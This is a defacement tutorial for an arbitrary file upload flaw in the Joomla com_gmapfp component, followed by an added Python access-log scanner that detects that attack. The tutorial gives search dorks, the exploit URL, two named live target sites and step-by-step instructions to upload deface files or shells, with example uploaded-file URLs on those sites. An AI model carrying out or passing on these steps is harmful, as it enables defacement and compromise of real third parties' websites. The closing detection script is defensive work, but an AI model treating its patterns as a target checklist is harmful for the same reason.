Tutorial - How to Deface with the Com_gmapfp Arbitrary File Upload Exploit

Keywords: Com_gmapfp Arbitrary File Upload Exploit, Joomla Arbitrary File Upload, Com_gmapfp Deface, Overwrite Joomla Index, How to Deface Joomla.

Dork:

inurl:"com_gmapfp"

inurl:/components/com_gmapfp/


Exploit:

index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload


Live targets:

https://www.aeroclub-savoie.com/

https://www.turizam.mostar.ba


1. First, find a fresh target using the dorks above.

2. Append the exploit string to the end of the domain or path.

Example:

  1. https://www.aeroclub-savoie.com/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
  2. https://www.aeroclub-savoie.com/[PATH]/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload

3. If an upload form like this appears, upload your image file or deface script. You may also be able to upload a shell (requires a bypass).

4. Then upload the file. Here I will upload the file pwn.gif.

5. If an alert like this appears, it means the file was uploaded successfully.

6. How to access the file:
target.com/images/gmapfp/yourfile.jpg
or
target.com/images/stories/gmapfp/yourfile.jpg

Examples:
- https://www.aeroclub-savoie.com/images/gmapfp/pwn.gif
- https://www.turizam.mostar.ba/images/stories/gmapfp/pwn.gif
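For a site owner, the requests in this procedure leave a recognisable trail in the web server access log. The following is an added example (not part of the original tutorial) that scans Combined Log Format lines for requests to the `edit_upload` task and for fetches from the two upload directories. The log lines, IP addresses, the file name `x.php.gif` and the extension list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format prefix: ip ident user [time] "METHOD uri PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})')
UPLOAD_DIRS = ("/images/gmapfp/", "/images/stories/gmapfp/")
# Assumption: any of these anywhere in an uploaded file name deserves review.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|html?|js|svg)(\.|$)")

def scan(lines):
    """Return (kind, ip, uri) findings in log order."""
    findings, uploaders = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, method, uri, status = m.groups()
        parts = urlsplit(uri)
        query = {k.lower(): v[-1].lower() for k, v in parse_qs(parts.query).items()}
        if query.get("option") == "com_gmapfp" and query.get("task") == "edit_upload":
            if method == "POST":
                uploaders.add(ip)  # remember who submitted the upload form
            findings.append(("upload_" + method.lower(), ip, uri))
            continue
        path = parts.path.lower()
        hit = next((d for d in UPLOAD_DIRS if d in path), None)
        if hit is None or status != "200":
            continue
        name = path.split(hit, 1)[1]
        if SCRIPT_EXT.search(name):
            findings.append(("script_like_file", ip, uri))
        elif ip in uploaders:
            findings.append(("fetch_after_upload", ip, uri))
    return findings

# Constructed sample lines using documentation IP ranges, not real traffic.
EP = "/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload"
SAMPLE = [
    f'203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET {EP} HTTP/1.1" 200 2311',
    f'203.0.113.7 - - [10/Mar/2024:10:00:09 +0000] "POST {EP} HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Mar/2024:10:00:15 +0000] "GET /images/gmapfp/pwn.gif HTTP/1.1" 200 4096',
    '198.51.100.20 - - [10/Mar/2024:10:02:00 +0000] "GET /images/gmapfp/map-pin.png HTTP/1.1" 200 900',
    '198.51.100.20 - - [10/Mar/2024:10:03:00 +0000] "GET /images/stories/gmapfp/x.php.gif HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding)
```

Ordinary visitors fetching existing images from these directories produce no finding; only the upload endpoint, a fetch by the same client after its POST, or a script-like file name is reported.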


